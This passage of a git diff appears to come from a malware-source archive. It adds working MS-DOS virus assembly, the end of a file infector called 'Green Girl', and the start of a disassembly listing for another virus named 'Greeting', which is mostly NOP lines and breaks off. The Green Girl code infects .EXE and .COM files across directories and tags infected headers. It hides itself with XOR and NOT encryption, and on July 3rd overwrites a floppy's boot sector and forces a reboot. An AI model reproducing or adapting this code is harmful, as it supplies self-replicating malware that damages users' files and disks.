MOV WORD PTR [ORIG_CSIP+BP], WORD PTR [TEMP_CSIP+BP] + MOV WORD PTR [ORIG_SSSP+BP], WORD PTR [TEMP_SSSP+BP] + MOV WORD PTR [ORIG_CSIP+BP+02H], WORD PTR [TEMP_CSIP+BP+02H] + MOV WORD PTR [ORIG_SSSP+BP+02H], WORD PTR [TEMP_SSSP+BP+02H] + ; +RESET: ; Reset run counter + MOV BYTE PTR [OFFSET RUN_COUNT+BP],1 + ; +SET_NEW_DTA: ; Make a new DTA + MOV AH, 01AH ; + LEA DX, OFFSET NEW_DTA_AREA+BP + INT 021H ; + ; +SAVE_CURRENT_DIR: ; Save current directory for traversal functions + MOV AH, 047H ; + XOR DL, DL ; + LEA SI, OFFSET DIR_BUFFER+BP + INT 021H ; + ; +SET_ERRORS: ; Make a new error handler to stop + ; write protect errors propping up. + MOV AX, 03524H ; + INT 21H ; + ; + LEA DI, OFFSET OLD_ERROR+BP + MOV [DI],ES ; + ADD DI,2 ; + MOV [DI],BX ; + ; + MOV AX,02524H ; + LEA DX, OFFSET NEW_ERROR_HANDLER+BP + INT 21H ; + ; + MOV ES, DS ; Restore modified ES register +; ********************************************************************* +; Activation routine for July 3rd. +; + ; + MOV AH, 02AH ; Get date + INT 21H ; + ; +MONTH: ; + CMP DH, 07H ; Check if it is July + JE DAY ; + JMP DATE_TEST_PASSED ; + ; +DAY: ; + CMP DL, 03H ; Check if it is the 3rd + JE BOOTER ; + JMP DATE_TEST_PASSED ; + ; If it got to this point, ITS MY BIRTHDAY! +BOOTER: ; + MOV AX,0201H ; Read old boot block data + MOV CX,1 ; + XOR DX,DX ; + LEA BX,OFFSET OLD_DATA+BP; + INT 013H ; + ; + MOV AH,03CH ; Create A:\BOOT.SEC + XOR CX,CX ; + LEA DX,OFFSET BOOT_NAME+BP + INT 21H ; + ; + JC QUIT ; Disk not there maybe? + ; + XCHG BX,AX ; Write A:\BOOT.SEC + MOV AH,040H ; + MOV CX,512 ; + LEA DX,OFFSET OLD_DATA+BP + INT 021H ; + ; + MOV AH,03EH ; + INT 021H ; Close file with boot sector inside + ; + MOV AX,0301H ; Write new boot sector to floppy + MOV CX,1 ; + XOR DX,DX ; + LEA BX, OFFSET START_WRITE+BP + INT 13H ; + ; +QUIT: ; Reboot computer to load up new boot segment + MOV AX,040H ; Set up for a warm reboot + MOV DS,AX ; + MOV AX, 012H ; + MOV [072H], AX ; + ; + DB 0EAH ; Do a jump to Offset:Segment following + DB 00,00,0FFH,0FFH ; which is FFFF:0000 as segment:offset + ; +;*********************************************************************** +; This is the boot_block start + +START_WRITE: ; + CLD ; + ; +NO_CURSOR: ; + MOV AH,1 ; + MOV CX,02000H ; + INT 010H ; + ; + MOV AX,0B800H ; Colour video segment + MOV ES,AX ; + XOR DI,DI ; + LEA SI, 07C00H+(OFFSET MESSAGE-OFFSET START_WRITE) + ; +LOOPY_GREEN: ; + MOV CX, 23 ; + REP MOVSW ; + SUB SI, 46 ; + LEA AX, 07C00H+(OFFSET LOOPY_GREEN-OFFSET START_WRITE) + JMP AX ; + ; +MESSAGE DB 'I',02,32 ,02,03 ,02,32 ,02,'Y',02,'O',02,'U',02,32,02 + DB 'G',02,'I',02,'R',02,'L',02,32 ,02,'I',02,'N',02 + DB 32 ,02,'G',02,'R',02,'E',02,'E',02,'N',02,'!',02,32,02 + ; +; This is the boot_block end +;*********************************************************************** + ; +DATE_TEST_PASSED: ; Find first file + MOV AH,04EH ; + JMP FINDER ; + ; +CHANGE_DIR: ; Go down in directory structure + MOV AH,03BH ; + LEA DX,OFFSET CHANGE_TO+BP + INT 021H ; + JC END_ALL ; In root, no more files + ; + MOV AH,04EH ; Since it is is a new dir, find first file + JMP FINDER ; + ; +RESET_ATTRIBS: ; Reset file time/date + MOV AX,05701H ; + MOV CX,[OFFSET TIME+BP] ; + MOV DX,[OFFSET DATE+BP] ; + INT 021H ; + RET ; + ; +CLOSE_FILE: ; Close file and reset attributes + MOV AH,03EH ; + INT 021H ; + ; + MOV AX,04301H ; + MOV CX,[OFFSET ATTRIBS+BP] + LEA DX,OFFSET NEW_DTA_AREA+1EH+BP + INT 021H ; + RET ; + ; +FINDER: ; Find first/next routine + LEA DX,[OFFSET FILE_MASK+BP] + MOV CX,0007H ; + INT 021H ; + ; + JC CHANGE_DIR ; Change dir if no more files + JMP FILE_FOUND ; + ; +DO_OTHER: ; Change file mask. This is the 2nd + ; pass, so look for .COM's instead of .EXE's + MOV BYTE PTR [OFFSET RUN_COUNT+BP],2 + MOV WORD PTR [OFFSET FILE_MASK+BP+2],'OC' + MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'M' + MOV AH,04EH ; + JMP FINDER ; + ; +END_ALL: ; + MOV AH,03BH ; Change to original dir + LEA DX,OFFSET SLASH+BP ; + INT 021H ; + ; Do second pass if not done already + CMP BYTE PTR [OFFSET RUN_COUNT+BP], 1 + JE DO_OTHER ; + ; + ; Reload original error handler + MOV DX,[OFFSET OLD_ERROR+BP+02H] + MOV DS,[OFFSET OLD_ERROR+BP] + MOV AX,02524H ; + INT 021H ; + ; + POP ES ; Reload original DS, ES + POP DS ; + ; Determine host file type + CMP BYTE PTR [OFFSET COM_OR_EXE+BP],1 + JE EXE_RESTORE ; + ; + MOV AH,01AH ; This will restore a .COM file + MOV DX,080H ; + INT 021H ; + ; + MOV DX,0100H ; + JMP DX ; + ; +EXE_RESTORE: ; This will restore a .EXE file + ; + MOV AH,1AH ; Reset original PSP + MOV DX,080H ; + INT 021H ; + ; + MOV AX,ES ; Get CS:IP ready to jump to + ADD AX,010H ; + ADD WORD PTR CS:[BP+ORIG_CSIP+02H],AX + ADD AX, WORD PTR CS:[BP+ORIG_SSSP+02H] + ; + CLI ; Restore stack segment and stack pointer + MOV SP, WORD PTR CS:[BP+ORIG_SSSP] + MOV SS,AX ; + STI ; + ; + DB 0EAH ; Far Jump Offset:Segment following + ; +;*************************************************************************** +; Data area + ; +ORIG_CSIP DW 0,0 ; Original CS:IP value +ORIG_SSSP DW 0,0 ; Original SS:SP value + ; +TEMP_CSIP DW 0,0 ; Temporary CS:IP value +TEMP_SSSP DW 0,0 ; Temporary SS:SP value + ; +CHANGE_TO DB '..',0 ; For directory traversal functions +FILE_MASK DB '*.EXE',0 ; File mask + ; +BOOT_NAME DB 'A:\BOOT.SEC',00 ; Holds original boot sector of a diskette + ; +COM_OR_EXE DB 1 ; 1=exe, 2=com +RUN_COUNT DB 1 ; 1=first, 2=second + ; +JUMPING DB 0E9H,00,00 ; Jump construct for a .COM file +ORIG_3 DB 3 DUP(?) ; Original .COM file bytes + ; +; End Data area +;*************************************************************************** + ; +POINTER_MOVER: ; + XOR CX,CX ; + XOR DX,DX ; + MOV AH, 042H ; + INT 021H ; + RET ; + ; +COM_TIME: ; Checks for ibmdos.com, ibmbio.com, command.com + ; So it works on PC/DOS and MS/DOS + MOV AL, BYTE PTR [OFFSET NEW_DTA_AREA+BP+01EH+2] + CMP AL,'M' ; + JNE NOT_DOS_FILE ; + JMP NOPE ; + ; +NOT_DOS_FILE: ; + MOV AL,02H ; + CALL POINTER_MOVER ; + ; + SUB DX,1 ; Jump to end of file-1 + SBB CX,0 ; + MOV AX,04202H ; + INT 021H ; + ; + MOV AH,03FH ; Read last byte of file + MOV CX,1 ; + LEA DX,OFFSET ORIG_3+BP ; + INT 021H ; + ; + MOV AL,[OFFSET ORIG_3+BP] + CMP AL,'\' ; + JNE CHECK_IT ; Infect file + ; +NOPE: ; Can't infect for some reason or another + CALL RESET_ATTRIBS ; + CALL CLOSE_FILE ; + MOV AH,04FH ; + JMP FINDER ; Already infected (It's my BAAAABBYYYY) + ; +CHECK_IT: ; + XOR AL,AL ; Beginning of file + CALL POINTER_MOVER ; + ; + MOV AH,03FH ; Read files first 3 bytes + MOV CX,3 ; + LEA DX,[OFFSET ORIG_3+BP] + INT 021H ; + ; + MOV AL,[OFFSET ORIG_3+BP] + ADD AL,[OFFSET ORIG_3+BP+1] + CMP AX,'M'+'Z' ; + JE NOPE ; + ; +INFECT_COM: ; + MOV AL,02H ; + CALL POINTER_MOVER ; + ; + SUB AX,3 ; Calculate jump offset + MOV [OFFSET JUMPING+BP+1],AX + ; + XOR AL,AL ; Beginning of file + CALL POINTER_MOVER ; + ; + MOV CX,3 ; Write jump bytes + MOV AH,040H ; + LEA DX,OFFSET JUMPING+BP; + INT 021H ; + ; + ; So that the infected file will look for + ; .EXE's on the first run and not .COM's, + ; this code here must be added + MOV WORD PTR [OFFSET FILE_MASK+BP+2],'XE' + MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'E' + ; Make sure that when the virus runs of it's new + ; .COM host, it knows it and isn't running as if + ; it was on the old host + MOV AL,[OFFSET COM_OR_EXE+BP] + PUSH AX ; + MOV BYTE PTR [OFFSET COM_OR_EXE+BP],2 + JMP END_WRITER ; + ; +FILE_FOUND: ; + MOV AX, 04300H ; Get and save attribs + LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH] + INT 21H ; + ; + MOV [OFFSET ATTRIBS+BP],CX + MOV WORD PTR [OFFSET TIME+BP],[OFFSET NEW_DTA_AREA+BP+016H] + MOV WORD PTR [OFFSET DATE+BP],[OFFSET NEW_DTA_AREA+BP+018H] + ; +CHANGE_ATTRIBS_NORMAL: ; Change attributes to NULL + MOV AX,04301H ; + XOR CX,CX ; + LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH] + INT 021H ; + JNC OPEN_FILE ; + MOV AH,04FH ; + JMP FINDER ; Somefink went wrong! + ; +OPEN_FILE: ; Open da file + MOV AX,03D02H ; + LEA DX,OFFSET NEW_DTA_AREA+BP+01EH + INT 021H ; + JNC WHAT_WRITE_ROUTINE ; + MOV AH,04FH ; + JMP FINDER ; Somefink else went wrong! + ; +WHAT_WRITE_ROUTINE: ; Write to a .COM or .EXE + XCHG BX,AX ; Put file handle in BX + CMP BYTE PTR [OFFSET FILE_MASK+BP+2],'E' + JE CHECK_INFECTED ; + JMP COM_TIME ; + ; +CHECK_INFECTED: ; Read in file header + MOV CX,01AH ; .EXE header is (01Ah bytes) + MOV AH,3FH ; + LEA DX,OFFSET FILE_HEADER+BP + INT 021H ; + ; Check if it is already infected + CMP WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG' + JNE TEST_WIN ; + JMP NOPE ; + ; +NEW_ERROR_HANDLER: ; New INT 024H handler + MOV AL,3 ; Fail system call + IRET ; + ; +TEST_WIN: ; + MOV AX,[OFFSET FILE_HEADER+BP+018H] + CMP AX,040H ; + JB MODIFY_HEADER ; Not windows file + JMP NOPE ; Is windows file + ; +MODIFY_HEADER: ; Begin transmorgification of the header + MOV AL,02H ; Get file size for later on + CALL POINTER_MOVER ; + ; + PUSH BX ; Save handle + PUSH DX ; Save file size + PUSH AX ; + ; TEMP_CSIP = Offset : Segment + LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+014H] + MOV WORD PTR [BP+OFFSET TEMP_CSIP], AX + MOV WORD PTR [BP+OFFSET TEMP_CSIP+02H], ES + ; Save stack pointer + ; TEMP_SSSP = Offset : Segment + LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+0EH] + MOV WORD PTR [BP+OFFSET TEMP_SSSP],ES + MOV WORD PTR [BP+OFFSET TEMP_SSSP+02H],AX + ; Convert header size to bytes + ; + MOV AX, WORD PTR [BP+FILE_HEADER+08H] + MOV CL,04H ; + SHL AX,CL ; + ; + XCHG BX,AX ; BX now holds the header size in bytes + ; + POP AX ; Get file size into DX:AX + POP DX ; + ; + PUSH AX ; Save file size for later AGAIN + PUSH DX ; + ; + SUB AX,BX ; Take header size from file size + SBB DX,0 ; + ; + MOV CX,010H ; Make it segment:offset form + DIV CX ; + ; Write new entry point + MOV WORD PTR [OFFSET FILE_HEADER+BP+014H],DX + MOV WORD PTR [OFFSET FILE_HEADER+BP+016H],AX + ; Write new Stack + ; Pointer and.... + MOV WORD PTR [OFFSET FILE_HEADER+BP+010H],0 + ; Segment! + MOV WORD PTR [OFFSET FILE_HEADER+BP+0EH],AX + ; Write ID bytes + MOV WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG' + ; + POP DX ; Get file length + POP AX ; + ; Add virus size + ADD AX,OFFSET END_VIRUS-OFFSET BEGIN + ADC DX,0 ; + ; + MOV CL,9 ; + PUSH AX ; Save file size+virus size + ; + SHR AX,CL ; + ROR DX,CL ; + STC ; + ADC DX,AX ; File size in pages + POP AX ; + AND AH,1 ; MOD 512 + ; Write new file size + MOV WORD PTR [BP+OFFSET FILE_HEADER+04H],DX + MOV WORD PTR [BP+OFFSET FILE_HEADER+02H],AX + ; Increase minimum memory requirements to + ; ORIG_MEM + VIRUS_MEM = TOTAL_MEM 8) + MOV AX,OFFSET END_FILE-OFFSET BEGIN + MOV CL,4 ; + SHR AX,CL ; + ; + ADD AX,WORD PTR [BP+OFFSET FILE_HEADER+0AH] + MOV WORD PTR [BP+OFFSET FILE_HEADER+0AH],AX + ; + POP BX ; Get handle again + ; +MOOWAAHAAHAAHAA: ; Infect the wanker! + XOR AL,AL ; Move to da start of da file + CALL POINTER_MOVER ; + ; + MOV CX,01AH ; Write header + MOV AH,040H ; + LEA DX,OFFSET FILE_HEADER+BP + INT 021H ; + ; So that the virus, when executing of its + ; new host knows that it will restore the bytes + ; as if attatched to a .EXE file + MOV AL, BYTE PTR [OFFSET COM_OR_EXE+BP] + PUSH AX ; + MOV BYTE PTR [OFFSET COM_OR_EXE+BP],1 + ; +END_WRITER: ; + MOV AL,02H ; Move to da end of da file + CALL POINTER_MOVER ; + ; +MAKE_NEW_ENC_VALUE: ; Get a new random encryption value + MOV AH,2CH ; + INT 21H ; + MOV BYTE PTR [OFFSET ENCRYPTION_VALUE+BP],DL + ; +END_XOR: ; End XOR here + ; Make it my BAAAABBYYYY + CALL XORER ; + CALL NOTTER ; + ; + MOV CX,OFFSET END_VIRUS-OFFSET BEGIN + MOV AH,40H ; + LEA DX,OFFSET BEGIN+BP ; + INT 021H ; + ; + CALL NOTTER ; Decrypt virus + CALL XORER ; + ; Restore original com_or_exe value + POP AX ; + MOV BYTE PTR [OFFSET COM_OR_EXE+BP],AL + ; + CALL RESET_ATTRIBS ; + CALL CLOSE_FILE ; + JMP END_ALL ; + ; + ; +XORER: ; + CLD ; String instruction increment + MOV ES,CS ; + MOV AH, [OFFSET ENCRYPTION_VALUE+BP] + MOV CX, OFFSET END_XOR-OFFSET START_XOR + LEA SI, [OFFSET START_XOR+BP] + MOV DI, SI ; + ; +XOR_LOOPER: ; + LODSB ; + XOR AL,AH ; + STOSB ; + LOOP XOR_LOOPER ; + RET ; + ; +NOTTER: ; + CLD ; Make sure string instructions increment + MOV ES,CS ; + MOV CX,OFFSET NOTTER-OFFSET XORER + LEA SI,[OFFSET XORER+BP] + MOV DI,SI ; + ; +NOT_LOOPER: ; + LODSB ; + NOT AL ; + STOSB ; + LOOP NOT_LOOPER ; + RET ; + ; +ENCRYPTION_VALUE DB 0 ; +ENC_OR_NOT DB 0 ; To encrypt or not to encrypt +SLASH DB '\' ; For directory traversal functions + ; +END_VIRUS: ; Everything from here on is not written + ; to infected files + ; +DIR_BUFFER DB 64 DUP (?) ; For directory traversal functions +NEW_DTA_AREA DB 128 DUP (?) ; New DTA place +ATTRIBS DW 0 ; Buffer for file attributes +TIME DW 0 ; " " " time +DATE DW 0 ; " " " date +FILE_HEADER DB 01AH DUP (?) ; File Header Read/Write Buffer +OLD_ERROR DW 0,0 ; Hold old error handler address +OLD_DATA DB 512 DUP (?) ; Holds old boot block + ; +END_FILE: ; +GREEN_GIRL ENDS ; +END BEGIN ; diff --git a/MSDOS/Virus.MSDOS.Unknown.greeting.asm b/MSDOS/Virus.MSDOS.Unknown.greeting.asm new file mode 100644 index 00000000..5d941c23 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.greeting.asm @@ -0,0 +1,2615 @@ + +; Ŀ +; Greeting Assembly Code (D86 Debug Used) +; + +0100 E9 EC 07 JMP 08EF +0103 42 INC DX +0104 41 INC CX +0105 0E PUSH CS +0106 01 CD ADD BP,CX +0108 21 B8 00 4C AND W[BX+SI+04C00],DI +010C CD 21 INT 021 ; Dos Functions +010E 48 DEC AX +010F 65 6C REPC INSB +0111 6C INSB +0112 6F OUTSW +0113 20 77 6F AND B[BX+06F],DH +0116 72 6C JB 0184 +0118 64 2E 2E 2E 0A 0D REPNC CS CS CS OR CL,B[DI] +011E 24 90 AND AL,090 +0120 90 NOP +0121 90 NOP +0122 90 NOP +0123 90 NOP +0124 90 NOP +0125 90 NOP +0126 90 NOP +0127 90 NOP +0128 90 NOP +0129 90 NOP +012A 90 NOP +012B 90 NOP +012C 90 NOP +012D 90 NOP +012E 90 NOP +012F 90 NOP +0130 90 NOP +0131 90 NOP +0132 90 NOP +0133 90 NOP +0134 90 NOP +0135 90 NOP +0136 90 NOP +0137 90 NOP +0138 90 NOP +0139 90 NOP +013A 90 NOP +013B 90 NOP +013C 90 NOP +013D 90 NOP +013E 90 NOP +013F 90 NOP +0140 90 NOP +0141 90 NOP +0142 90 NOP +0143 90 NOP +0144 90 NOP +0145 90 NOP +0146 90 NOP +0147 90 NOP +0148 90 NOP +0149 90 NOP +014A 90 NOP +014B 90 NOP +014C 90 NOP +014D 90 NOP +014E 90 NOP +014F 90 NOP +0150 90 NOP +0151 90 NOP +0152 90 NOP +0153 90 NOP +0154 90 NOP +0155 90 NOP +0156 90 NOP +0157 90 NOP +0158 90 NOP +0159 90 NOP +015A 90 NOP +015B 90 NOP +015C 90 NOP +015D 90 NOP +015E 90 NOP +015F 90 NOP +0160 90 NOP +0161 90 NOP +0162 90 NOP +0163 90 NOP +0164 90 NOP +0165 90 NOP +0166 90 NOP +0167 90 NOP +0168 90 NOP +0169 90 NOP +016A 90 NOP +016B 90 NOP +016C 90 NOP +016D 90 NOP +016E 90 NOP +016F 90 NOP +0170 90 NOP +0171 90 NOP +0172 90 NOP +0173 90 NOP +0174 90 NOP +0175 90 NOP +0176 90 NOP +0177 90 NOP +0178 90 NOP +0179 90 NOP +017A 90 NOP +017B 90 NOP +017C 90 NOP +017D 90 NOP +017E 90 NOP +017F 90 NOP +0180 90 NOP +0181 90 NOP +0182 90 NOP +0183 90 NOP +0184 90 NOP +0185 90 NOP +0186 90 NOP +0187 90 NOP +0188 90 NOP +0189 90 NOP +018A 90 NOP +018B 90 NOP +018C 90 NOP +018D 90 NOP +018E 90 NOP +018F 90 NOP +0190 90 NOP +0191 90 NOP +0192 90 NOP +0193 90 NOP +0194 90 NOP +0195 90 NOP +0196 90 NOP +0197 90 NOP +0198 90 NOP +0199 90 NOP +019A 90 NOP +019B 90 NOP +019C 90 NOP +019D 90 NOP +019E 90 NOP +019F 90 NOP +01A0 90 NOP +01A1 90 NOP +01A2 90 NOP +01A3 90 NOP +01A4 90 NOP +01A5 90 NOP +01A6 90 NOP +01A7 90 NOP +01A8 90 NOP +01A9 90 NOP +01AA 90 NOP +01AB 90 NOP +01AC 90 NOP +01AD 90 NOP +01AE 90 NOP +01AF 90 NOP +01B0 90 NOP +01B1 90 NOP +01B2 90 NOP +01B3 90 NOP +01B4 90 NOP +01B5 90 NOP +01B6 90 NOP +01B7 90 NOP +01B8 90 NOP +01B9 90 NOP +01BA 90 NOP +01BB 90 NOP +01BC 90 NOP +01BD 90 NOP +01BE 90 NOP +01BF 90 NOP +01C0 90 NOP +01C1 90 NOP +01C2 90 NOP +01C3 90 NOP +01C4 90 NOP +01C5 90 NOP +01C6 90 NOP +01C7 90 NOP +01C8 90 NOP +01C9 90 NOP +01CA 90 NOP +01CB 90 NOP +01CC 90 NOP +01CD 90 NOP +01CE 90 NOP +01CF 90 NOP +01D0 90 NOP +01D1 90 NOP +01D2 90 NOP +01D3 90 NOP +01D4 90 NOP +01D5 90 NOP +01D6 90 NOP +01D7 90 NOP +01D8 90 NOP +01D9 90 NOP +01DA 90 NOP +01DB 90 NOP +01DC 90 NOP +01DD 90 NOP +01DE 90 NOP +01DF 90 NOP +01E0 90 NOP +01E1 90 NOP +01E2 90 NOP +01E3 90 NOP +01E4 90 NOP +01E5 90 NOP +01E6 90 NOP +01E7 90 NOP +01E8 90 NOP +01E9 90 NOP +01EA 90 NOP +01EB 90 NOP +01EC 90 NOP +01ED 90 NOP +01EE 90 NOP +01EF 90 NOP +01F0 90 NOP +01F1 90 NOP +01F2 90 NOP +01F3 90 NOP +01F4 90 NOP +01F5 90 NOP +01F6 90 NOP +01F7 90 NOP +01F8 90 NOP +01F9 90 NOP +01FA 90 NOP +01FB 90 NOP +01FC 90 NOP +01FD 90 NOP +01FE 90 NOP +01FF 90 NOP +0200 90 NOP +0201 90 NOP +0202 90 NOP +0203 90 NOP +0204 90 NOP +0205 90 NOP +0206 90 NOP +0207 90 NOP +0208 90 NOP +0209 90 NOP +020A 90 NOP +020B 90 NOP +020C 90 NOP +020D 90 NOP +020E 90 NOP +020F 90 NOP +0210 90 NOP +0211 90 NOP +0212 90 NOP +0213 90 NOP +0214 90 NOP +0215 90 NOP +0216 90 NOP +0217 90 NOP +0218 90 NOP +0219 90 NOP +021A 90 NOP +021B 90 NOP +021C 90 NOP +021D 90 NOP +021E 90 NOP +021F 90 NOP +0220 90 NOP +0221 90 NOP +0222 90 NOP +0223 90 NOP +0224 90 NOP +0225 90 NOP +0226 90 NOP +0227 90 NOP +0228 90 NOP +0229 90 NOP +022A 90 NOP +022B 90 NOP +022C 90 NOP +022D 90 NOP +022E 90 NOP +022F 90 NOP +0230 90 NOP +0231 90 NOP +0232 90 NOP +0233 90 NOP +0234 90 NOP +0235 90 NOP +0236 90 NOP +0237 90 NOP +0238 90 NOP +0239 90 NOP +023A 90 NOP +023B 90 NOP +023C 90 NOP +023D 90 NOP +023E 90 NOP +023F 90 NOP +0240 90 NOP +0241 90 NOP +0242 90 NOP +0243 90 NOP +0244 90 NOP +0245 90 NOP +0246 90 NOP +0247 90 NOP +0248 90 NOP +0249 90 NOP +024A 90 NOP +024B 90 NOP +024C 90 NOP +024D 90 NOP +024E 90 NOP +024F 90 NOP +0250 90 NOP +0251 90 NOP +0252 90 NOP +0253 90 NOP +0254 90 NOP +0255 90 NOP +0256 90 NOP +0257 90 NOP +0258 90 NOP +0259 90 NOP +025A 90 NOP +025B 90 NOP +025C 90 NOP +025D 90 NOP +025E 90 NOP +025F 90 NOP +0260 90 NOP +0261 90 NOP +0262 90 NOP +0263 90 NOP +0264 90 NOP +0265 90 NOP +0266 90 NOP +0267 90 NOP +0268 90 NOP +0269 90 NOP +026A 90 NOP +026B 90 NOP +026C 90 NOP +026D 90 NOP +026E 90 NOP +026F 90 NOP +0270 90 NOP +0271 90 NOP +0272 90 NOP +0273 90 NOP +0274 90 NOP +0275 90 NOP +0276 90 NOP +0277 90 NOP +0278 90 NOP +0279 90 NOP +027A 90 NOP +027B 90 NOP +027C 90 NOP +027D 90 NOP +027E 90 NOP +027F 90 NOP +0280 90 NOP +0281 90 NOP +0282 90 NOP +0283 90 NOP +0284 90 NOP +0285 90 NOP +0286 90 NOP +0287 90 NOP +0288 90 NOP +0289 90 NOP +028A 90 NOP +028B 90 NOP +028C 90 NOP +028D 90 NOP +028E 90 NOP +028F 90 NOP +0290 90 NOP +0291 90 NOP +0292 90 NOP +0293 90 NOP +0294 90 NOP +0295 90 NOP +0296 90 NOP +0297 90 NOP +0298 90 NOP +0299 90 NOP +029A 90 NOP +029B 90 NOP +029C 90 NOP +029D 90 NOP +029E 90 NOP +029F 90 NOP +02A0 90 NOP +02A1 90 NOP +02A2 90 NOP +02A3 90 NOP +02A4 90 NOP +02A5 90 NOP +02A6 90 NOP +02A7 90 NOP +02A8 90 NOP +02A9 90 NOP +02AA 90 NOP +02AB 90 NOP +02AC 90 NOP +02AD 90 NOP +02AE 90 NOP +02AF 90 NOP +02B0 90 NOP +02B1 90 NOP +02B2 90 NOP +02B3 90 NOP +02B4 90 NOP +02B5 90 NOP +02B6 90 NOP +02B7 90 NOP +02B8 90 NOP +02B9 90 NOP +02BA 90 NOP +02BB 90 NOP +02BC 90 NOP +02BD 90 NOP +02BE 90 NOP +02BF 90 NOP +02C0 90 NOP +02C1 90 NOP +02C2 90 NOP +02C3 90 NOP +02C4 90 NOP +02C5 90 NOP +02C6 90 NOP +02C7 90 NOP +02C8 90 NOP +02C9 90 NOP +02CA 90 NOP +02CB 90 NOP +02CC 90 NOP +02CD 90 NOP +02CE 90 NOP +02CF 90 NOP +02D0 90 NOP +02D1 90 NOP +02D2 90 NOP +02D3 90 NOP +02D4 90 NOP +02D5 90 NOP +02D6 90 NOP +02D7 90 NOP +02D8 90 NOP +02D9 90 NOP +02DA 90 NOP +02DB 90 NOP +02DC 90 NOP +02DD 90 NOP +02DE 90 NOP +02DF 90 NOP +02E0 90 NOP +02E1 90 NOP +02E2 90 NOP +02E3 90 NOP +02E4 90 NOP +02E5 90 NOP +02E6 90 NOP +02E7 90 NOP +02E8 90 NOP +02E9 90 NOP +02EA 90 NOP +02EB 90 NOP +02EC 90 NOP +02ED 90 NOP +02EE 90 NOP +02EF 90 NOP +02F0 90 NOP +02F1 90 NOP +02F2 90 NOP +02F3 90 NOP +02F4 90 NOP +02F5 90 NOP +02F6 90 NOP +02F7 90 NOP +02F8 90 NOP +02F9 90 NOP +02FA 90 NOP +02FB 90 NOP +02FC 90 NOP +02FD 90 NOP +02FE 90 NOP +02FF 90 NOP +0300 90 NOP +0301 90 NOP +0302 90 NOP +0303 90 NOP +0304 90 NOP +0305 90 NOP +0306 90 NOP +0307 90 NOP +0308 90 NOP +0309 90 NOP +030A 90 NOP +030B 90 NOP +030C 90 NOP +030D 90 NOP +030E 90 NOP +030F 90 NOP +0310 90 NOP +0311 90 NOP +0312 90 NOP +0313 90 NOP +0314 90 NOP +0315 90 NOP +0316 90 NOP +0317 90 NOP +0318 90 NOP +0319 90 NOP +031A 90 NOP +031B 90 NOP +031C 90 NOP +031D 90 NOP +031E 90 NOP +031F 90 NOP +0320 90 NOP +0321 90 NOP +0322 90 NOP +0323 90 NOP +0324 90 NOP +0325 90 NOP +0326 90 NOP +0327 90 NOP +0328 90 NOP +0329 90 NOP +032A 90 NOP +032B 90 NOP +032C 90 NOP +032D 90 NOP +032E 90 NOP +032F 90 NOP +0330 90 NOP +0331 90 NOP +0332 90 NOP +0333 90 NOP +0334 90 NOP +0335 90 NOP +0336 90 NOP +0337 90 NOP +0338 90 NOP +0339 90 NOP +033A 90 NOP +033B 90 NOP +033C 90 NOP +033D 90 NOP +033E 90 NOP +033F 90 NOP +0340 90 NOP +0341 90 NOP +0342 90 NOP +0343 90 NOP +0344 90 NOP +0345 90 NOP +0346 90 NOP +0347 90 NOP +0348 90 NOP +0349 90 NOP +034A 90 NOP +034B 90 NOP +034C 90 NOP +034D 90 NOP +034E 90 NOP +034F 90 NOP +0350 90 NOP +0351 90 NOP +0352 90 NOP +0353 90 NOP +0354 90 NOP +0355 90 NOP +0356 90 NOP +0357 90 NOP +0358 90 NOP +0359 90 NOP +035A 90 NOP +035B 90 NOP +035C 90 NOP +035D 90 NOP +035E 90 NOP +035F 90 NOP +0360 90 NOP +0361 90 NOP +0362 90 NOP +0363 90 NOP +0364 90 NOP +0365 90 NOP +0366 90 NOP +0367 90 NOP +0368 90 NOP +0369 90 NOP +036A 90 NOP +036B 90 NOP +036C 90 NOP +036D 90 NOP +036E 90 NOP +036F 90 NOP +0370 90 NOP +0371 90 NOP +0372 90 NOP +0373 90 NOP +0374 90 NOP +0375 90 NOP +0376 90 NOP +0377 90 NOP +0378 90 NOP +0379 90 NOP +037A 90 NOP +037B 90 NOP +037C 90 NOP +037D 90 NOP +037E 90 NOP +037F 90 NOP +0380 90 NOP +0381 90 NOP +0382 90 NOP +0383 90 NOP +0384 90 NOP +0385 90 NOP +0386 90 NOP +0387 90 NOP +0388 90 NOP +0389 90 NOP +038A 90 NOP +038B 90 NOP +038C 90 NOP +038D 90 NOP +038E 90 NOP +038F 90 NOP +0390 90 NOP +0391 90 NOP +0392 90 NOP +0393 90 NOP +0394 90 NOP +0395 90 NOP +0396 90 NOP +0397 90 NOP +0398 90 NOP +0399 90 NOP +039A 90 NOP +039B 90 NOP +039C 90 NOP +039D 90 NOP +039E 90 NOP +039F 90 NOP +03A0 90 NOP +03A1 90 NOP +03A2 90 NOP +03A3 90 NOP +03A4 90 NOP +03A5 90 NOP +03A6 90 NOP +03A7 90 NOP +03A8 90 NOP +03A9 90 NOP +03AA 90 NOP +03AB 90 NOP +03AC 90 NOP +03AD 90 NOP +03AE 90 NOP +03AF 90 NOP +03B0 90 NOP +03B1 90 NOP +03B2 90 NOP +03B3 90 NOP +03B4 90 NOP +03B5 90 NOP +03B6 90 NOP +03B7 90 NOP +03B8 90 NOP +03B9 90 NOP +03BA 90 NOP +03BB 90 NOP +03BC 90 NOP +03BD 90 NOP +03BE 90 NOP +03BF 90 NOP +03C0 90 NOP +03C1 90 NOP +03C2 90 NOP +03C3 90 NOP +03C4 90 NOP +03C5 90 NOP +03C6 90 NOP +03C7 90 NOP +03C8 90 NOP +03C9 90 NOP +03CA 90 NOP +03CB 90 NOP +03CC 90 NOP +03CD 90 NOP +03CE 90 NOP +03CF 90 NOP +03D0 90 NOP +03D1 90 NOP +03D2 90 NOP +03D3 90 NOP +03D4 90 NOP +03D5 90 NOP +03D6 90 NOP +03D7 90 NOP +03D8 90 NOP +03D9 90 NOP +03DA 90 NOP +03DB 90 NOP +03DC 90 NOP +03DD 90 NOP +03DE 90 NOP +03DF 90 NOP +03E0 90 NOP +03E1 90 NOP +03E2 90 NOP +03E3 90 NOP +03E4 90 NOP +03E5 90 NOP +03E6 90 NOP +03E7 90 NOP +03E8 90 NOP +03E9 90 NOP 